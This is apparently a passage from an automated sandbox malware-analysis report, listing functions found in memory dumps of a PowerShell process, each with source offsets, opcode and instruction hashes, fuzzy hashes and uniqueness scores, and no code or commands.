                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c5bc73db646b998453d4a614188ff033b2c624a92169c49eade185948a3bd439
                                  • Instruction ID: baaf1a1812b9e2af216c8bb38792f1571b97821cf468935506605f63cd7d5186
                                  • Opcode Fuzzy Hash: c5bc73db646b998453d4a614188ff033b2c624a92169c49eade185948a3bd439
                                  • Instruction Fuzzy Hash: 32216F71B00109CBCF14DFA9D898AEDBBB6FB88711F108039E502AB250CB719D45CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07C67828 Relevance: .1, Instructions: 79COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 17efe6a03a3bbbe53bb42e1750f0ab4b3a5b825431fd689ab6ade6f04c62be29
                                  • Instruction ID: fe0d206eb9e1ea2b09105344ab9bd98b018671a7543716eb36d6b46d0f19a313
                                  • Opcode Fuzzy Hash: 17efe6a03a3bbbe53bb42e1750f0ab4b3a5b825431fd689ab6ade6f04c62be29
                                  • Instruction Fuzzy Hash: 46311974A14209CFDB14DF69C0C9A9DBBF1AF88324F199468D406BB3A5DB74AC45CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D3A738 Relevance: .1, Instructions: 78COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 35c6d6d414cc444440246180039d7442bc0dd814b243ccb45f17b20c6e16d220
                                  • Instruction ID: 857d0a3c79bdc107ca1ad8bd352890173179467f1018d448a34777d23df25587
                                  • Opcode Fuzzy Hash: 35c6d6d414cc444440246180039d7442bc0dd814b243ccb45f17b20c6e16d220
                                  • Instruction Fuzzy Hash: 213180B0B002469FD7149B64C858BAEBBF6BF88315F148468E446EB7A0DF71AC45CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07AE14C9 Relevance: .1, Instructions: 77COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1751971064.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ae0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c36585bc3fe58757e3a866bda5989fcd17b80e9c07733471491051a744421a04
                                  • Instruction ID: f841547b3068bca29a01e6269855e05dd52d14edb72cc59ce666bd86b1c8e2d2
                                  • Opcode Fuzzy Hash: c36585bc3fe58757e3a866bda5989fcd17b80e9c07733471491051a744421a04
                                  • Instruction Fuzzy Hash: A621E5F1A042199FCB21CF28C851AA97BF5FF86211F4980AAD415DB212E730DC90CBF2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D3E171 Relevance: .1, Instructions: 75COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b9ede3816b678ef1ef359ec3d4b97bb93427022a1724e501eca0c4ee76cd50df
                                  • Instruction ID: 326401471650b49acaffbb1ff8b9580797150cb35365e7a9e8e447c2a7b8246c
                                  • Opcode Fuzzy Hash: b9ede3816b678ef1ef359ec3d4b97bb93427022a1724e501eca0c4ee76cd50df
                                  • Instruction Fuzzy Hash: A8219075B002499FCB05DFA8C880ABEBBB6FF88314F14416AE9059B341CB31DC52CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CBEF38 Relevance: .1, Instructions: 75COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b2bc90562402e09481ace90eb477f712ff2a28a60b8f302b2be8c16321c788c4
                                  • Instruction ID: d4c891e392e58ab64b3930e6e5b931c51900d35f1a7f74ff9d5bca72330e05ef
                                  • Opcode Fuzzy Hash: b2bc90562402e09481ace90eb477f712ff2a28a60b8f302b2be8c16321c788c4
                                  • Instruction Fuzzy Hash: 3F3109B1600215CFDB24DFA4D998AEABBF1EF48715F144069E50AEB3A0DB719941CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CBFEE0 Relevance: .1, Instructions: 75COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2b731dd249d1324d9b859a1bbd7e5ef77cf9a881a94c011c822772af5a620859
                                  • Instruction ID: 485ec36cbffdb5849e42922db09ec6b498482d5c8b2f28dc171429edec34fff6
                                  • Opcode Fuzzy Hash: 2b731dd249d1324d9b859a1bbd7e5ef77cf9a881a94c011c822772af5a620859
                                  • Instruction Fuzzy Hash: 152181B2A011559FCB24DFADC54059EFBF5EF99210F1581AAE948EB311D630ED40C7A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D362F0 Relevance: .1, Instructions: 73COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 389e57d18692c51c69b8fcc1e663809493455827466c7de8dab587201226e69b
                                  • Instruction ID: 1c8d57ea89b89faa1242db4e7cfdc426e1ba7d8e7aaafaa592d931f6da532dfb
                                  • Opcode Fuzzy Hash: 389e57d18692c51c69b8fcc1e663809493455827466c7de8dab587201226e69b
                                  • Instruction Fuzzy Hash: F011D6B97052129BEB245666D0243BEBAEADBC1355F085039E806C7784EF7DCD85C790
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CBFED0 Relevance: .1, Instructions: 73COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fdfb19b3ac39b29cb0556a5ba5ed886f115403c30b5863e0a3ace3a9964348d7
                                  • Instruction ID: 37510ecd7e3c60d4d062639651f59b3c122d7896e1f2cec9f976e21a16d2e36e
                                  • Opcode Fuzzy Hash: fdfb19b3ac39b29cb0556a5ba5ed886f115403c30b5863e0a3ace3a9964348d7
                                  • Instruction Fuzzy Hash: 9221C4B1A011959FCB21CB6CC58069EFBE0EF8A310F05819EE848DB312D630ED40CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D3B119 Relevance: .1, Instructions: 71COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eb055adba5f40bd68527d4a855a8333c84c601b5b986f35ae9edfcad54d8ae8a
                                  • Instruction ID: 07d2e47724268caa4a85c4a77da0c7858b4f24a3ae247d6522dcfb3d99490179
                                  • Opcode Fuzzy Hash: eb055adba5f40bd68527d4a855a8333c84c601b5b986f35ae9edfcad54d8ae8a
                                  • Instruction Fuzzy Hash: F5216D75A0464A9FCB10DFA8D88199EFBF1FF89300B004A29D545AB755DB31AD058BA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D3B508 Relevance: .1, Instructions: 70COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b1177e68fff4e502dde531b92c558ff0578ef29b7be4aa65512c4ec79fe567f4
                                  • Instruction ID: e75e7297ef511d7428ac11366298f5e458982f0d63e9dcd5064aab6b07d02572
                                  • Opcode Fuzzy Hash: b1177e68fff4e502dde531b92c558ff0578ef29b7be4aa65512c4ec79fe567f4
                                  • Instruction Fuzzy Hash: 7221A9756003059FC710CB28C891EA6BBF6FB88310F148AA9E94A8B352D670EC45CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D3C380 Relevance: .1, Instructions: 68COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4dcc2def59467d1643162ac1001e187ea615f79acc3f397976409682e8fc85b7
                                  • Instruction ID: e8b2168e90e9a45277478aab219ce05c5511ccd02ccc0ad9c03175b6f15785fe
                                  • Opcode Fuzzy Hash: 4dcc2def59467d1643162ac1001e187ea615f79acc3f397976409682e8fc85b7
                                  • Instruction Fuzzy Hash: EE214A74B002089FDB08DFA4C455AADB7B2FF88304F148469E616EB390CF759C42CB60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CBEF31 Relevance: .1, Instructions: 68COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bb0012f01ca2538dcdcf256ac5c3d49bc1ada0b16a86f7b7bca1ac096131e9b6
                                  • Instruction ID: 12cfe997dfc49a7ac5b80051c68cdd5900cf5a3f4efbf0814c6ae511e14f038d
                                  • Opcode Fuzzy Hash: bb0012f01ca2538dcdcf256ac5c3d49bc1ada0b16a86f7b7bca1ac096131e9b6
                                  • Instruction Fuzzy Hash: 74212AB4600214CFDB14DF68D998AE9BBF1FF48315F154069E806EB3A1DB71A881CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D3A620 Relevance: .1, Instructions: 67COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f30f03c6478c210663181d04866749ff1026e0d10f2731507da3cf3fae223c47
                                  • Instruction ID: 09d5d758d606e1ef86f83c5ca885473083936b705a4885c3ef155692dd23a479
                                  • Opcode Fuzzy Hash: f30f03c6478c210663181d04866749ff1026e0d10f2731507da3cf3fae223c47
                                  • Instruction Fuzzy Hash: C7218EB07046419FDB189B64D958BAEBBF2AF88301F244469E442EB3A1DF768D44CF60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07C6B2D8 Relevance: .1, Instructions: 66COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fa1a15b14125ae9757a4e06c74196bb944081fdf49d41418b0db55ae50dbc091
                                  • Instruction ID: 7731655827e2a793017ba6b36b7a4d9b83b4b901762c50946d635992c7e0c102
                                  • Opcode Fuzzy Hash: fa1a15b14125ae9757a4e06c74196bb944081fdf49d41418b0db55ae50dbc091
                                  • Instruction Fuzzy Hash: 171106F1B041528BEB202E2E84D87BEF3D6EB82310F794477D855D7A41DE25DD814792
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07C67CD0 Relevance: .1, Instructions: 65COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4bf202cc7969f50746ff2da6c29999d41385edf4d2efca564f8cacaf9a30a633
                                  • Instruction ID: ed520a1aa795fef76dedf2c296d24f38c7bac7b8ae414104aee4dc2ce3dac8a5
                                  • Opcode Fuzzy Hash: 4bf202cc7969f50746ff2da6c29999d41385edf4d2efca564f8cacaf9a30a633
                                  • Instruction Fuzzy Hash: 02218CB19002098FCB04DFA8C9859EDBBF1FF88314F148829C504EB640EB30AA45CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D3B518 Relevance: .1, Instructions: 64COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 663b6e31c213500295a443725f620f7c60113ecaa2969c70481d525d4f9946a4
                                  • Instruction ID: b5585f18fe9621b305b498f78e7dc7e18a4640f952426078e374f1c7c9909b69
                                  • Opcode Fuzzy Hash: 663b6e31c213500295a443725f620f7c60113ecaa2969c70481d525d4f9946a4
                                  • Instruction Fuzzy Hash: 5E216D756007059FC714CB28D881EA6FBF6FB89310F148AA9E95ACB352D670FC45CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D396B6 Relevance: .1, Instructions: 63COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ee73593e03c40613f9302bdfc460a8d222f7b3e6ae4c496a826af64949d2c106
                                  • Instruction ID: dcd18df9b01a26b91ea76e24562da31e3fa077459ec275e13f436e0ffd11c9a5
                                  • Opcode Fuzzy Hash: ee73593e03c40613f9302bdfc460a8d222f7b3e6ae4c496a826af64949d2c106
                                  • Instruction Fuzzy Hash: 771190F5E006158B8B14CF7985502EEFAF5AF88609F10402AD845E7340EB71AA028BA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D3B128 Relevance: .1, Instructions: 63COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3ef7726a01268b44c746f054c7890f95e4c81567e08008667ed1bafe8ceb8ff9
                                  • Instruction ID: b7c7e75e912362019ae353afb4fd9d2fb511e36404e1fd4946cfd81d2b8796df
                                  • Opcode Fuzzy Hash: 3ef7726a01268b44c746f054c7890f95e4c81567e08008667ed1bafe8ceb8ff9
                                  • Instruction Fuzzy Hash: E5214F70A0060A9FCB10DFA8D88199EF7F2FF88304F404A29E545AB710DB71AD058FE1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CB613D Relevance: .1, Instructions: 62COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dffc4ab6ea31d4c015ca1eb974044174b3a895b227a4ea6b5ba5ff685698ae2d
                                  • Instruction ID: 2ece1bc876121a0004d0417aa7db88440fe37c455740447d7278462dbdc4f3a8
                                  • Opcode Fuzzy Hash: dffc4ab6ea31d4c015ca1eb974044174b3a895b227a4ea6b5ba5ff685698ae2d
                                  • Instruction Fuzzy Hash: 6421F874A00219CFDB24DFA4C494A9DBBB2FF89305F1485A9E409EB761CB719D81CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07C66F78 Relevance: .1, Instructions: 61COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 34e06f41b371ce476b32250ae13a0d6b5e18db1e94b191acf23005e3ba77ce89
                                  • Instruction ID: 983314bac6e8584cd54275da50e3b33b9bd0f8035ee07a2ec34179adf58421d7
                                  • Opcode Fuzzy Hash: 34e06f41b371ce476b32250ae13a0d6b5e18db1e94b191acf23005e3ba77ce89
                                  • Instruction Fuzzy Hash: A211E1327041255FD714A6A9E888B6BB7EAEBC4325F14843AE109D7680CE759C05C7A0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D35FE8 Relevance: .1, Instructions: 60COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c1e3878e61f11810bc8726ea60a19a96f35942dad5a4708ff16c2c1539157755
                                  • Instruction ID: b3d8740d80745a3e5c7e192dc31c1613e587e610d740ea65ee5ee6a4d491d099
                                  • Opcode Fuzzy Hash: c1e3878e61f11810bc8726ea60a19a96f35942dad5a4708ff16c2c1539157755
                                  • Instruction Fuzzy Hash: 3411E071B052429BCB01DBA8D8509EFB7A2EFC6311F04447AE548FB341EB349D058BA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D3A630 Relevance: .1, Instructions: 58COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dbaf7993f8e9528df532c181e6b70f6ef7bb32f76328d2d18d4a84c62eda8cde
                                  • Instruction ID: 2eaefe8b9d39137547f1a84358b5a4b1b2b994fe0b52a9be50e843a70ca3268e
                                  • Opcode Fuzzy Hash: dbaf7993f8e9528df532c181e6b70f6ef7bb32f76328d2d18d4a84c62eda8cde
                                  • Instruction Fuzzy Hash: EA1190707002058FDB149B64C958BAEBBF2AF88711F204469E442EB3E1DF769D40CF60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07C6B2C8 Relevance: .1, Instructions: 56COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0e5aee08feb87ff7acd20376b5c1f2d839394ca17096ae66745b1f125001aa15
                                  • Instruction ID: 1145bceafff0d36faf1a9cbc3a7899eebdfb56b702992792406d9e98432bbfa5
                                  • Opcode Fuzzy Hash: 0e5aee08feb87ff7acd20376b5c1f2d839394ca17096ae66745b1f125001aa15
                                  • Instruction Fuzzy Hash: 4001F5F17041924BEB301E1D94C87FEF7E69B82311F298077E845DBA42CD25CD8157A2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07C69EC0 Relevance: .1, Instructions: 56COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1e58f163fb4a0655870f89c5c00f9e7ca539f1c49222aa124bf28b5996b87376
                                  • Instruction ID: 2e7938b07fefa0d764cbf7284d12a05e3d464f968a3789bfbec4a59c98b6e9f2
                                  • Opcode Fuzzy Hash: 1e58f163fb4a0655870f89c5c00f9e7ca539f1c49222aa124bf28b5996b87376
                                  • Instruction Fuzzy Hash: C801B1B27146224BEB209A79D5C87B273D8DF40765F0544BEE809CB291D679FD408781
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D3B380 Relevance: .1, Instructions: 55COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6e42f8a6640327ec15fc05593ed044487cfb6c4aabc953b7510afcdfa5d7da9e
                                  • Instruction ID: eb1383de393820305ae70aff0ca43299bee1ae32e1b99eb7503a1b83c165bdb1
                                  • Opcode Fuzzy Hash: 6e42f8a6640327ec15fc05593ed044487cfb6c4aabc953b7510afcdfa5d7da9e
                                  • Instruction Fuzzy Hash: A601D6B121D394ABCB115B358814BAA7FA99FC2600F15806BE645CB791D57DC805C7A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D3B7B0 Relevance: .1, Instructions: 54COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 56ff39039f9e19c87e900b383e9d227d44776a481ce8d37dcdc47091b381c7df
                                  • Instruction ID: 609de422773cc621176506779e2605775437905350cba6d6516f1002be4a4fcc
                                  • Opcode Fuzzy Hash: 56ff39039f9e19c87e900b383e9d227d44776a481ce8d37dcdc47091b381c7df
                                  • Instruction Fuzzy Hash: DE113D75E002089FCB44DFA9D4859EEBBF6FB8C210F14842AEA05E7354DB319D158FA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07C691C4 Relevance: .1, Instructions: 54COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 148c5db02d1319fbd76fea37151d0199aca3fbdfe2b6fb8e4f5c1060e873828e
                                  • Instruction ID: 0065bea4ee03f7b23406627a4c90147c555fcb0dbe5abd144109ba53dff916aa
                                  • Opcode Fuzzy Hash: 148c5db02d1319fbd76fea37151d0199aca3fbdfe2b6fb8e4f5c1060e873828e
                                  • Instruction Fuzzy Hash: E101F9B17125008FCB541A28DACE2BD7373BFCAA25F51151DE1039B7C4CB75AD468A82
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CBD507 Relevance: .1, Instructions: 53COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f6e4d6aad7c171a2c03afe06ada0eef70cf808a900dc3d2c867a073d9373fda3
                                  • Instruction ID: a86b61b72c539eac9f932243eb92e7e88092a77c09853f67d6646dfd734e824a
                                  • Opcode Fuzzy Hash: f6e4d6aad7c171a2c03afe06ada0eef70cf808a900dc3d2c867a073d9373fda3
                                  • Instruction Fuzzy Hash: 19115CB0A14659DFDB209FA0DCD8AEE7BB5FF48715F044429E003AA261CB71A885CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D3A141 Relevance: .1, Instructions: 51COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7688453f017fd33ab0ee895541df10a20af706fd380ec1da7be94fc98f196bc2
                                  • Instruction ID: 07af3061f940f45cd5351c08d7a83c54b80fcc93d9d6f79802181449184f84ff
                                  • Opcode Fuzzy Hash: 7688453f017fd33ab0ee895541df10a20af706fd380ec1da7be94fc98f196bc2
                                  • Instruction Fuzzy Hash: 131126B0B052905FD7118B649C10BFF7FB19F85700F1440AAE544EB2D2CAB45915CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D3DDA0 Relevance: .1, Instructions: 51COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9b91d6a066748284e5d3845164c486f05644e01fb43ae7d58c9c16f4edc0bac5
                                  • Instruction ID: ac7eaac9e4a6ababa3b3fd1630d99b585751cbf93510b9dce5bc5b64167ab589
                                  • Opcode Fuzzy Hash: 9b91d6a066748284e5d3845164c486f05644e01fb43ae7d58c9c16f4edc0bac5
                                  • Instruction Fuzzy Hash: C6116DB0E0525AAFDB48DFA5D844AEEFFB2AF48314F14812AE854B7250C7748950CB60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D35BC0 Relevance: .1, Instructions: 51COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
